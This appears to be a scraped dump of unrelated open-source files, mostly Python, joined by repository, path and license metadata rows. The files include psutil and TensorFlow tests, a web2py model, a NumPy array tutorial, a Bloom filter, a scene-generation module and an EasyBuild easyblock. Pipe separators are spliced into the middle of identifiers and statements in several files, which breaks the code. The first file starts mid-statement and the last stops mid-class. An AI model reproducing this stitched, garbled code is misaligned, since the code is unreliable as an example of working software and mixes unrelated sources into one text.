delta=MEMORY_TOLERANCE)
# --- mocked tests
def test_virtual_memory_mocked_warnings(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil._pslinux.virtual_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'cached', 'active' and 'inactive' memory stats couldn't "
"be determined", str(w.message))
self.assertEqual(ret.cached, 0)
self.assertEqual(ret.active, 0)
self.assertEqual(ret.inactive, 0)
def test_swap_memory_mocked_warnings(self):
with mock.patch('psutil._pslinux.open', create=True) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil._pslinux.swap_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'sin' and 'sout' swap memory stats couldn't "
"be determined", str(w.message))
self.assertEqual(ret.sin, 0)
self.assertEqual(ret.sout, 0)
def test_swap_memory_mocked_no_vmstat(self):
# see https://github.com/giampaolo/psutil/issues/722
with mock.patch('psutil._pslinux.open', create=True,
side_effect=IOError) as m:
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
ret = psutil.swap_memory()
assert m.called
self.assertEqual(len(ws), 1)
w = ws[0]
self.assertTrue(w.filename.endswith('psutil/_pslinux.py'))
self.assertIn(
"'sin' and 'sout' swap memory stats couldn't "
"be determined and were set to 0",
str(w.message))
self.assertEqual(ret.sin, 0)
self.assertEqual(ret.sout, 0)
# =====================================================================
# system CPU
# =====================================================================
@unittest.skipUnless(LINUX, "not a Linux system")
class TestSystemCPU(unittest.TestCase):
@unittest.skipIf(TRAVIS, "unknown failure on travis")
def test_cpu_times(self):
fields = psutil.cpu_times()._fields
kernel_ver = re.findall('\d+\.\d+\.\d+', os.uname()[2])[0]
kernel_ver_info = tuple(map(int, kernel_ver.split('.')))
if kernel_ver_info >= (2, 6, 11):
self.assertIn('steal', fields)
else:
self.assertNotIn('steal', fields)
if kernel_ver_info >= (2, 6, 24):
self.assertIn('g |
tensorflow/tensorflow | tensorflow/python/tpu/tpu_embedding_v2_utils_test.py | Python | apache-2.0 | 4,791 | 0.004174 | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ======================================================= | =======================
"""Tests for TPU Embeddings mid level API utils on TPU."""
from absl.testing import parameterized
from tensorflow.core.protobuf.tpu import tpu_embedding_configuration_pb2
from tensorflow.python.compat import v2_compat
from tensorflo | w.python.platform import test
from tensorflow.python.tpu import tpu_embedding_v2_utils
class TPUEmbeddingOptimizerTest(parameterized.TestCase, test.TestCase):
@parameterized.parameters(tpu_embedding_v2_utils.Adagrad,
tpu_embedding_v2_utils.Adam,
tpu_embedding_v2_utils.FTRL)
def test_grad_clip_with_accumulation_off(self, optimizer):
with self.assertRaisesRegex(ValueError, 'accumulation'):
optimizer(use_gradient_accumulation=False, clipvalue=0.)
with self.assertRaisesRegex(ValueError, 'accumulation'):
optimizer(use_gradient_accumulation=False, clipvalue=(None, 1.))
@parameterized.parameters(tpu_embedding_v2_utils.SGD,
tpu_embedding_v2_utils.Adagrad,
tpu_embedding_v2_utils.Adam,
tpu_embedding_v2_utils.FTRL)
def test_grad_clip_with_tuple(self, optimizer):
opt = optimizer(clipvalue=(-1., 1.))
self.assertEqual(-1., opt.clip_gradient_min)
self.assertEqual(1., opt.clip_gradient_max)
@parameterized.parameters(tpu_embedding_v2_utils.SGD,
tpu_embedding_v2_utils.Adagrad,
tpu_embedding_v2_utils.Adam,
tpu_embedding_v2_utils.FTRL)
def test_grad_clip_with_single_value(self, optimizer):
opt = optimizer(clipvalue=1.)
self.assertEqual(-1., opt.clip_gradient_min)
self.assertEqual(1., opt.clip_gradient_max)
@parameterized.parameters(tpu_embedding_v2_utils.SGD,
tpu_embedding_v2_utils.Adagrad,
tpu_embedding_v2_utils.Adam,
tpu_embedding_v2_utils.FTRL)
def test_grad_clip_with_tuple_and_none(self, optimizer):
opt = optimizer(clipvalue=(None, 1))
self.assertIsNone(opt.clip_gradient_min)
self.assertEqual(1., opt.clip_gradient_max)
class ConfigTest(test.TestCase):
def test_table_config_repr(self):
table = tpu_embedding_v2_utils.TableConfig(
vocabulary_size=2, dim=4,
combiner='sum', name='table')
self.assertEqual(
repr(table),
'TableConfig(vocabulary_size=2, dim=4, initializer=None, '
'optimizer=None, combiner=\'sum\', name=\'table\')')
def test_feature_config_repr(self):
table = tpu_embedding_v2_utils.TableConfig(
vocabulary_size=2, dim=4, initializer=None,
combiner='sum', name='table')
feature_config = tpu_embedding_v2_utils.FeatureConfig(
table=table, name='feature')
self.assertEqual(
repr(feature_config),
'FeatureConfig(table=TableConfig(vocabulary_size=2, dim=4, '
'initializer=None, optimizer=None, combiner=\'sum\', name=\'table\'), '
'max_sequence_length=0, validate_weights_and_indices=True, '
'name=\'feature\')')
class TPUEmbeddingConfigurationTest(test.TestCase):
def test_no_truncate(self):
    truncate_length = 14937 # Experimentally determined maximum loggable string length.
config = tpu_embedding_configuration_pb2.TPUEmbeddingConfiguration()
for i in range(500):
td = config.table_descriptor.add()
td.name = 'table_{}'.format(i)
td.vocabulary_size = i
config.num_hosts = 2
config.num_tensor_cores = 4
config.batch_size_per_tensor_core = 128
self.assertGreater(
len(str(config)), truncate_length,
'Test sanity check: generated config should be of truncating length.')
with self.assertLogs() as logs:
tpu_embedding_v2_utils.log_tpu_embedding_configuration(config)
self.assertIn('table_499', ''.join(logs.output))
for line in logs.output:
self.assertLess(
len(line), truncate_length,
'Logging function lines should not be of truncating length.')
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
bmi-forum/bmi-pyre | pythia-0.8/packages/pulse/tests/signon.py | Python | gpl-2.0 | 867 | 0.00692 | #!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# | California Institute of Technology
# (C) 1998-2005 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
if __name__ == "__main__":
import pulse
from pulse import pulse as pulsemodule
print "copyright information:"
print " ", pulse.copyright()
print " ", pulsemodule.copyright()
| print
print "module information:"
print " file:", pulsemodule.__file__
print " doc:", pulsemodule.__doc__
print " contents:", dir(pulsemodule)
# version
__id__ = "$Id: signon.py,v 1.1.1.1 2005/03/08 16:13:57 aivazis Exp $"
# End of file
|
urrego093/proyecto_mv | applications/welcome/models/db.py | Python | gpl-3.0 | 4,097 | 0.01196 | # -*- coding: utf-8 -*-
#########################################################################
## This scaffolding model makes your app work on Google App Engine too
## File is released under public domain and you can use without limitations
#########################################################################
## if SSL/HTTPS is properly configured and you want all HTTP requests to
## be redirected to HTTPS, uncomment the line below:
# request.requires_https()
## app configuration made easy. Look inside private/appconfig.ini
from gluon.contrib.appconfig import AppConfig
## once in production, remove reload=True to gain full speed
myconf = AppConfig(reload=True)
if not request.env.web2py_runtime_gae:
## if NOT running on Google App Engine use SQLite or other DB
db = DAL(myconf.get('db.uri'),
pool_size = myconf.get('db.pool_size'),
migrate_enabled = myconf.get('db.migrate'),
check_reserved = ['all'])
else:
## connect to Google BigTable (optional 'google:datastore://namespace')
db = DAL('google:datastore+ndb')
## store sessions and tickets there
session.connect(request, response, db=db)
## or store session in Memcache, Redis, etc.
## from gluon.contrib.memdb import MEMDB
## from google.appengine.api.memcache import Client
## session.connect(request, response, db = MEMDB(Client()))
## by default give a view/generic.extension to all actions from localhost
## none otherwise. a pattern can be 'controller/function.extension'
response.generic_patterns = ['*'] if request.is_local else []
## choose a style for forms
response.formstyle = myconf.get('forms.formstyle') # or 'bootstrap3_stacked' or 'bootstrap2' or other
response.form_label_separator = myconf.get('forms.separator') or ''
## (optional) optimize handling of static files
# response.optimize_css = 'concat,minify,inline'
# response.optimize_js = 'concat,minify,inline'
## (optional) static assets folder versioning
# response.static_version = '0.0.0'
#########################################################################
## Here is sample code if you need for
## - email capabilities
## - authentication (registration, login, logout, ... )
## - authorization (role based authorization)
## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)
## - old style crud actions
## (more options discussed in gluon/tools.py)
#########################################################################
from gluon.tools import Auth, Service, PluginManager
auth = Auth(db, host=myconf.get('host.name'))
service = Service()
plugins = PluginManager()
## create all tables needed by auth if not custom tables
auth.define_tables(username=False, signature=False)
## configure email
mail = auth.settings.mailer
mail.settings.server = 'logging' if request.is_local else myconf.get('smtp.server')
mail.settings.sender = myconf.get('smtp.sender')
mail.settings.login = myconf.get('smtp.login')
mail.settings.tls = myconf.get('smtp.tls') or False
mail.settings.ssl = myconf.get('smtp.ssl') or False
## configure auth policy
auth.settings.registration_requires_verification = False
auth.settings.registration_requires_approval = False
auth.settings.reset_password_requires_verification = True
#########################################################################
## Define your tables below (or better in another model file) for example
##
## >>> db.define_table('mytable',Field('myfield','string'))
##
## Fields can be 'string','text','password','integer','double','boolean'
## 'date','time','datetime','blob','upload', 'reference TABLENAME'
## There is an implicit 'id int | eger autoincrement' field
## Consult manual for more options, validators, etc.
##
## More API examples for controllers:
##
## >>> db.mytable.insert(myfield='value')
## >>> rows=db(db.mytable.myfield=='value').select(db.myta | ble.ALL)
## >>> for row in rows: print row.id, row.myfield
#########################################################################
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
|
sirikata/scene-generator | scene.py | Python | bsd-2-clause | 4,096 | 0.00708 | import numpy
import cache
import open3dhub
def sirikata_bounds(boundsInfo):
minpt, maxpt = boundsInfo['bounds']
minpt, maxpt = numpy.copy(minpt), numpy.copy(maxpt)
center = boundsInfo['center']
center_distance = boundsInfo['center_farthest_distance']
# center the bounding box
minpt -= center
maxpt -= center
# bounding box is scaled by 1 / (distance from center to farthest point)
minpt /= center_distance
maxpt /= center_distance
return (minpt, maxpt)
def height_offset(boundsInfo):
minpt, maxpt = sirikata_bounds(boundsInfo)
height_range = (maxpt[2] - minpt[2])
return height_range / 2.0
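# Illustrative sketch with made-up bounds data (assuming the boundsInfo dict layout
# used above); roughly:
#   boundsInfo = {'bounds': (numpy.array([0., 0., 0.]), numpy.array([2., 2., 4.])),
#                 'center': numpy.array([1., 1., 2.]),
#                 'center_farthest_distance': 2.0}
#   sirikata_bounds(boundsInfo) -> (approx. [-0.5, -0.5, -1.0], [0.5, 0.5, 1.0])
#   height_offset(boundsInfo)   -> 1.0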
def mapgen_coords_to_sirikata(loc, terrain):
# mapgen starts at 0,0,0 as the corner, but terrain gets centered at 0,0,0
loc = loc - terrain.center
# scale the coordinates to the scaled coordinates of the terrain mesh
loc /= terrain.boundsInfo['center_farthest_distance']
# then scale back by the terrain's scale
loc *= terrain.scale
# adjust the height by how much the terrain is offset
loc[2] += height_offset(terrain.boundsInfo) * terrain.scale
return loc
class SceneModel(object):
def __init__(self, path, x, y, z, scale, model_type,
orient_x=0, orient_y=0, orient_z=0, orient_w=1):
self.path = path
self.x = x
self.y = y
self.z = z
self.scale = scale
self.model_type = model_type
self.orient_x = orient_x
self.orient_y = orient_y
self.orient_z = orient_z
self.orient_w = orient_w
self._metadata = None
self._mesh = None
self._boundsInfo = None
def _load_mesh(self):
if self._mesh is None:
| self._metadata, self._mesh = open3dhub.path_to_mesh(self.path, cache=True)
def _get_mesh(self):
self._load_mesh()
return self._mesh
mesh = property(_get_mesh)
def _get_metadata(self):
if self._metadata is N | one:
self._metadata = cache.get_metadata(self.path)
return self._metadata
metadata = property(_get_metadata)
def _get_bounds_info(self):
if self._boundsInfo is None:
self._boundsInfo = cache.get_bounds(self.path)
return self._boundsInfo
boundsInfo = property(_get_bounds_info)
center = property(lambda s: s.boundsInfo['center'])
v3 = property(lambda s: numpy.array([s.x, s.y, s.z], dtype=numpy.float32))
sirikata_uri = property(lambda s: 'meerkat:///' +
s.metadata['basepath'] + '/' +
'optimized' + '/' +
s.metadata['version'] + '/' +
s.metadata['basename'])
def to_json(self):
z = self.z + height_offset(self.boundsInfo) * self.scale
# below swaps from z-up to y-up
return {
'path': self.path,
'sirikata_uri': self.sirikata_uri,
'x': self.x,
'y': z,
'z': -1.0 * self.y,
'orient_x': self.orient_x,
'orient_y': self.orient_z,
'orient_z': -1.0 * self.orient_y,
'orient_w': self.orient_w,
'scale': self.scale,
'type': self.model_type,
}
def __str__(self):
return '<SceneModel %s <%.7g,%.7g,%.7g> %.7g>' % \
(self.path, self.x, self.y, self.z, self.scale)
def __repr__(self):
return str(self)
@staticmethod
def from_json(j):
m = SceneModel(j['path'],
j['x'],
-1.0 * j['z'],
j['y'],
j['scale'],
j['type'],
orient_x=j['orient_x'],
orient_y=-1.0 * j['orient_z'],
orient_z=j['orient_y'],
orient_w=j['orient_w'])
return m
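# Minimal standalone sketch of the z-up <-> y-up swap used by to_json()/from_json()
# above (these helper names are not part of the original module):
def _zup_to_yup(x, y, z):
    # Sirikata JSON is y-up: y takes the old z, z takes the negated old y.
    return (x, z, -1.0 * y)

def _yup_to_zup(x, y, z):
    # Inverse mapping, mirroring what from_json() does with the stored values.
    return (x, -1.0 * z, y)

assert _yup_to_zup(*_zup_to_yup(1.0, 2.0, 3.0)) == (1.0, 2.0, 3.0)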
|
ivanovmi/google-cli-tools | setup.py | Python | gpl-2.0 | 218 | 0 | #!/usr/bin/env python
# -- coding: utf-8 --
__author__ = 'michael'
import setuptools
try:
import multiprocessing # noqa
except ImportError:
pass
setuptools.setup(
setup_requires=['pbr'],
pbr=True) | ||
Akagi201/akcode | python/numpy/numpy_create.py | Python | gpl-2.0 | 3,554 | 0.012158 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
## NumPy provides many functions specifically for creating arrays
"""
arange() is similar to the built-in range(): it creates a one-dimensional arithmetic-progression array from a start value, a stop value and a step. Note that the resulting array does not contain the stop value.
For example, the program below creates an arithmetic array with start 0, stop 1 and step 0.1; note that the stop value 1 is not in the array:
"""
import numpy as np
print np.arange(0, 1, 0.1)
"""
linspace() creates a one-dimensional arithmetic-progression array from a start value, a stop value and the number of elements. The endpoint parameter controls whether the stop value is included; its default is True, i.e. the stop value is included.
The two examples below show the results for endpoint=True and endpoint=False; note that the value of endpoint changes the step of the progression:
"""
print np.linspace(0, 1, 10) # step is 1/9
print np.linspace(0, 1, 10, endpoint = False) # step is 1/10
"""
logspace() is similar to linspace(), but the array it creates is a geometric progression.
The example below produces a geometric progression from 10**0 to 10**2 with 5 elements; note that the start value 0 stands for 10**0 and the stop value 2 stands for 10**2:
"""
print np.logspace(0, 2, 5)
"""
The base can be specified with the base parameter; its default value is 10.
Below, setting base to 2 and endpoint to False creates a geometric array whose ratio is 2**(1/12):
"""
print np.logspace(0, 1, 12, base = 2, endpoint = False)
"""
zeros(), ones() and empty() create arrays with the specified shape and dtype. empty() only allocates the memory used by the array and does not initialize its elements,
so it is the fastest of the three. The program below creates an array of shape (2, 3) with integer elements:
"""
print np.empty((2, 3), np.int) # only allocates memory, does not initialize it
"""
whereas zero | s() initializes the array elements to 0 and ones() initializes them to 1.
The following creates a one-dimensional float array of length 4 with every element initialized to 0:
"""
print np.zeros(4, np.float)
print np.ones(4, np.float)
"""
Arrays can also be created from byte sequences or files with functions such as frombuffer(), fromstring() and fromfile().
"""
s = "abcdefg | h"
"""
A Python string is actually a byte sequence, one byte per character, so creating an 8-bit integer array from the string s
yields exactly the ASCII code of each character in the string:
"""
print np.fromstring(s, dtype = np.int8)
"""
If a 16-bit integer array is created from the string s, every two adjacent bytes form one integer; taking byte 98 and byte 97 as a single 16-bit integer
gives 98*256+97 = 25185. This shows that 16-bit integers are stored in memory with the low byte first (little-endian):
"""
print np.fromstring(s, dtype = np.int16)
## Convert the whole string into an array of 64-bit double-precision floats
print np.fromstring(s, dtype = np.float)
## You can first define a function that computes a value from an index, then use fromfunction() to create an array from that function
def func(i):
return i % 4 + 1
"""
The first argument of fromfunction() is the function that computes each array element; the second argument specifies the shape of the array. Because it supports multi-dimensional arrays,
the second argument must be a sequence. Here the second argument is the length-1 tuple (10,), so a one-dimensional array with 10 elements is created.
"""
np.fromfunction(func, (10,))
## The example below creates a two-dimensional array representing the 9x9 multiplication table; each element a[i, j] of the output array equals func2(i, j):
def func2(i, j):
return (i + 1) * (j + 1)
a = np.fromfunction(func2, (9, 9))
print a
|
Stanford-Online/edx-submissions | submissions/migrations/0002_auto_20151119_0913.py | Python | agpl-3.0 | 948 | 0.00211 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import submissions.models
class Migration(migrations.Migration):
dependencies = [
('submissions', '0001_initial'),
]
operations = [
migrations.CreateModel(
| name='ScoreAnnotation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('annotation_type', models.CharField(max_length=255, db_index=True)),
('creator', submissions.models.AnonymizedUserIDField()),
| ('reason', models.TextField()),
('score', models.ForeignKey(to='submissions.Score')),
],
),
migrations.AlterField(
model_name='studentitem',
name='student_id',
field=submissions.models.AnonymizedUserIDField(),
),
]
|
chrisdrackett/django-support | support/functions.py | Python | bsd-3-clause | 187 | 0.016043 | from django.utils.importlib import i | mport_module
def function_from_string(string):
modu | le, func = string.rsplit(".", 1)
m = import_module(module)
return getattr(m, func) |
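# Hedged usage sketch for function_from_string() above; the dotted path below is
# illustrative only (any importable "module.attribute" path works):
if __name__ == "__main__":
    join = function_from_string("os.path.join")
    print(join("tmp", "file.txt"))  # -> "tmp/file.txt" on POSIX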
dwighthubbard/micropython-cloudmanager | cloudmanager/utility.py | Python | mit | 538 | 0.001859 | """
Basic utility functions
"""
import redislite
from .server import RDB | _FILE
def header(message, width=80):
header_message = '## ' + message | + ' '
end_chars = width - (len(message) + 4)
header_message += '#'*end_chars
print(header_message)
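# Expected output sketch (illustrative): header("Status", width=20) prints
# "## Status ##########" -- the message padded with '#' up to the requested width.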
def connect_to_redis():
return redislite.Redis(dbfilename=RDB_FILE)
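    # Note: the lines below are unreachable (the function has already returned) and
    # appear to be leftovers from an earlier plain-redis implementation; read_rc_config
    # and redis are not defined or imported in this module.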
host = read_rc_config()["settings"].get('redis_server', '127.0.0.1')
port = read_rc_config()["settings"].get('redis_port', '18266')
port = int(port)
return redis.Redis(host=host, port=port)
|
cloudbase/heat2arm | heat2arm/parser/tests/hot/test_template.py | Python | apache-2.0 | 2,462 | 0 | # Copyright 2015 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
This module contains tests for Heat template parsing mechanics.
"""
import unittest
from yaml.parser import ParserError
from heat2arm.parser.common.exceptions import (
TemplateDataException
)
from heat2arm.parser.hot.constants import HEAT_TEMPLATE_FIELDS
from heat2arm.parser.testing.hot_testing import COMPLETE_TEST_TEMPLATE
from heat2arm.parser.testing.template_testing import (
TemplateParsingTestInput,
TemplateParsingTestCase
)
class HeatTemplateParsingTestCase(TemplateParsingTestCase, unittest.TestCase):
""" HeatTemplateParsingTestCase respresents a set of tests which ensure the
prope | r parsing of Heat Templates.
"""
_field_names = HEAT_TEMPLATE_FIELDS
_function_application_test_data = COMPLETE_TEST_TEMPLATE
_re | source_parsing_test_data = COMPLETE_TEST_TEMPLATE
_template_parsing_test_data = [
TemplateParsingTestInput(
"test empty template",
"",
TemplateDataException
),
TemplateParsingTestInput(
"test invalid JSON",
"some : [random] _ ness )",
ParserError
),
TemplateParsingTestInput(
"not a valid template",
"it's just a string...",
TemplateDataException
),
TemplateParsingTestInput(
"no relevant fields provided",
"{ 'some': 'random_dict' }",
TemplateDataException
),
TemplateParsingTestInput(
"no 'parameters' field provided",
"{ 'resources': 'they should be here...' }",
TemplateDataException
),
TemplateParsingTestInput(
"no 'resources' field provided",
"{ 'parameters': 'some_random_parameters_data' }",
TemplateDataException
),
]
|
nealzhang/util | FastBloomFilter.py | Python | lgpl-3.0 | 2,828 | 0.02157 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from FastBitSet import FastBitSet
import math
import mmh3
class FastBloomFilter(object):
mask32 = 0xffffffff
mask64 = 0xffffffffffffffff
mask128 = 0xffffffffffffffffffffffffffffffff
seeds = [2, 3, 5, 7, 11,
13, 17, 19, 23, 29,
31, 37, 41, 43, 47,
53, 59, 61, 67, 71,
73, 79, 83, 89, 97,
101, 103, 107, 109, 113,
127, 131, 137, 139, 149,
151, 157, 163, 167, 173,
179, 181, 191, 193, 197,
199, 211, 223, 227, 229,
233, 239, 241, 251, 257,
263, 269, 271, 277, 281,
283, 293, 307, 311, 313,
317, 331, 337, 347, 349,
353, 359, 367, 373, 379,
383, 389, 397, 401, 409,
419, 421, 431, 433, 439,
| 443, 449, 457, 461, 463,
467, 479, 487, 491, 499,
503, 509, 521, 523, 541,
547, 557, 563, 569, 571,
577, 587, 593, 599, 601,
607, 613, 617, 619, 631,
641, 643, 647, 653, 659,
661, 673, 677, 683, 691]
def __init__(self, n, fpr=0.00001):
m = -1 * math.log(fpr, math.e) * n / math.pow(math.log(2, math.e), 2)
k = (m / n) * math.log(2, math.e)
sel | f.n = int(math.ceil(n))
self.fpr = fpr
self.m = int(math.ceil(m))
self.k = int(k)
self.bsUnitSize = 64
self.bsCap = int(math.ceil(self.m / 64))
self.bitSet = FastBitSet(self.bsCap, self.bsUnitSize)
self.bitSetLength = self.bitSet.length
def append(self, s):
self.bitSet.setList(self.hashs(s, self.k))
def exists(self, s):
bites = self.bitSet.getList(self.hashs(s, self.k))
return not (0 in bites)
def remove(self, s):
self.bitSet.setList(self.hashs(s, self.k), False)
def clear(self):
self.bitSet.clear()
def hashs(self, s, k):
bitSetLength = self.bitSetLength
#mask = self.mask32
mask = self.mask128
seeds = self.seeds
hashs = []
for i in range(k):
#print(mmh3.hash64(s, seeds[i]))
#hashs.append((mmh3.hash(s, seeds[i]) & mask) % bitSetLength)
hashs.append((mmh3.hash128(s, seeds[i]) & mask) % bitSetLength)
return hashs
def hashs2(self, s, k):
bitSetLength = self.bitSetLength
mask = self.mask32
hashs = []
hash1 = mmh3.hash64(s, 0)
hash2 = mmh3.hash64(s, hash1)
for i in k:
hashs.append(((hash1 + i * hash2) % bitSetLength) & mask)
return hashs
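# Hedged usage sketch (illustrative; assumes the FastBitSet/mmh3 imports above resolve).
# Sizing follows the usual Bloom-filter formulas computed in __init__:
# m = -n*ln(fpr)/ln(2)^2 bits and k = (m/n)*ln(2) hash functions.
if __name__ == "__main__":
    bf = FastBloomFilter(100000, fpr=0.001)
    bf.append("hello")
    print(bf.exists("hello"))    # True
    print(bf.exists("missing"))  # almost always False (false-positive chance ~ fpr)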
|
jungla/ICOM-fluidity-toolbox | Detectors/offline_advection/plot_Tracer_spec.py | Python | gpl-2.0 | 3,374 | 0.035566 | import os, sys
import myfun
import numpy as np
import matplotlib as mpl
mpl.use('ps')
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from scipy import interpolate
import lagrangian_st | ats
import scipy.fftpack
## READ archive (too many points... somehow)
# args: name, dayi, dayf, days
#label = 'm_25_2_512'
label = 'm_25_1_particles'
dayi = 0 #10*24*2
dayf = 1 #10*24*4
days = 1
#label = sys.argv[1]
#basename = sys.argv[2]
#dayi = int(sys.argv[3])
#da | yf = int(sys.argv[4])
#days = int(sys.argv[5])
path = '../Tracer_CG/'
try: os.stat('./plot/'+label)
except OSError: os.mkdir('./plot/'+label)
# dimensions archives
# ML exp
Xlist = np.linspace(0,2000,161)
Ylist = np.linspace(0,2000,161)
Zlist = np.linspace(0,-50,51)
dl = [0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1]
Zlist = np.cumsum(dl)
xn = len(Xlist)
yn = len(Ylist)
zn = len(Zlist)
dx = np.diff(Xlist)
z = 1
for time in range(dayi,dayf,days):
print 'time:', time
tlabel = str(time)
while len(tlabel) < 3: tlabel = '0'+tlabel
#Velocity_CG_m_50_6e_9.csv
file0 = path+'Tracer_'+str(z)+'_CG_'+label+'_'+str(time)+'.csv'
#
T = lagrangian_stats.read_Scalar(file0,zn,xn,yn)
T = np.sum(T,0)/3.
FT = np.zeros((xn/1,yn))
#
for j in range(len(Ylist)):
tempfft = scipy.fftpack.fft(T[:,j]**2,xn)
FT[:,j] = abs(tempfft)**2
w = scipy.fftpack.fftfreq(xn, dx[1])
# w = scipy.fftpack.fftshift(w)
FTp = np.mean(FT,1)/xn
# ideal t=0
Theory = T*0 + 3
for j in range(len(Ylist)):
tempfft = scipy.fftpack.fft(Theory[:,j]**2,xn)
FT[:,j] = abs(tempfft)**2
w = scipy.fftpack.fftfreq(xn, dx[1])
# w = scipy.fftpack.fftshift(w)
FTpT = np.mean(FT,1)/xn
fig = plt.figure(figsize=(10,8))
p25, = plt.plot(w, FTp,'r',linewidth=2)
# p25theory, = plt.plot(w[w>=0], FTpT[w>=0],'b',linewidth=2)
# plt.legend([p25,p25theory],['Model [$C=1.0\pm 10^{-11}$]','Theory [$C=1.0$]'])
# plt.plot([5*10**-3, 5*10**-2],[5*10**-22 , 5*10**-( 22+5/3.)],'k',linewidth=1.5)
# plt.plot([5*10**-3, 5*10**-2],[5*10**-22 , 5*10**-( 22+3.)],'k',linewidth=1.5)
# plt.plot([5*10**-3, 5*10**-2],[5*10**-22 , 5*10**-( 22+1.)],'k',linewidth=1.5)
# plt.text(6*10**-2, 5*10**-( 22+5/3.), '-5/3',fontsize=18)
# plt.text(6*10**-2, 5*10**-( 22+3.), '-3',fontsize=18)
# plt.text(6*10**-2, 5*10**-( 22+1.), '-1',fontsize=18)
# plt.text(10**-3, 10**-22,str(time*360./3600)+'hr',fontsize=18)
# plt.ylim((10**-32,10**-19))
plt.xlabel(r'k $[m^{-1}]$',fontsize=20)
plt.ylabel(r'PSD',fontsize=20)
plt.yticks(fontsize=18)
plt.xticks(fontsize=18)
# plt.xlim([1/2000.,1/10.])
plt.savefig('./plot/'+label+'/Tracer_'+str(z)+'_CG_'+label+'_'+tlabel+'_spec.eps',bbox_inches='tight')
print './plot/'+label+'/Tracer_'+str(z)+'_CG_'+label+'_'+tlabel+'_spec.eps'
plt.close()
#
v = np.linspace(0, 10, 10, endpoint=True)
vl = np.linspace(0, 10, 5, endpoint=True)
fig = plt.figure(figsize=(6,6))
fig.add_subplot(111,aspect='equal')
plt.contourf(Xlist/1000,Ylist/1000,T,30,extend='both',cmap=plt.cm.PiYG)
plt.colorbar()
plt.title(str(np.round(10*(time*360./3600))/10.0)+'h')
plt.ylabel('Y [km]',fontsize=16)
plt.xlabel('X [km]',fontsize=16)
plt.savefig('./plot/'+label+'/Tracer_'+str(z)+'_CG_'+label+'_'+str(time)+'.eps',bbox_inches='tight')
print './plot/'+label+'/Tracer_'+str(z)+'_CG_'+label+'_'+str(time)+'.eps'
plt.close()
|
boegel/easybuild-easyblocks | easybuild/easyblocks/p/psi.py | Python | gpl-2.0 | 11,600 | 0.003534 | ##
# Copyright 2013-2021 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing PSI, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
@author: Ward Poelmans (Ghent University)
"""
from distutils.version import LooseVersion
import glob
import os
import shutil
import tempfile
import easybuild.tools.environment as env
from easybuild.easyblocks.generic.cmakemake import CMakeMake
from easybuild.easyblocks.generic.configuremake import ConfigureMake
from easybuild.framework.easyconfig import BUILD
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.modules import get_software_root
from easybuild.tools.run import run_cmd
class EB_PSI(CMakeMake):
"""
Support for building and installing PSI
"""
def __init__(self, *args, **kwargs):
"""Initialize class variables custom to PSI."""
super(EB_PSI, self).__init__(*args, **kwargs)
self.psi_srcdir = None
self.install_psi_objdir = None
self.install_psi_srcdir = None
@staticmethod
def extra_options():
"""Extra easyconfig parameters specific to PSI."""
extra_vars = CMakeMake.extra_options()
extra_vars.update({
# always include running PSI unit tests (takes about 2h or less)
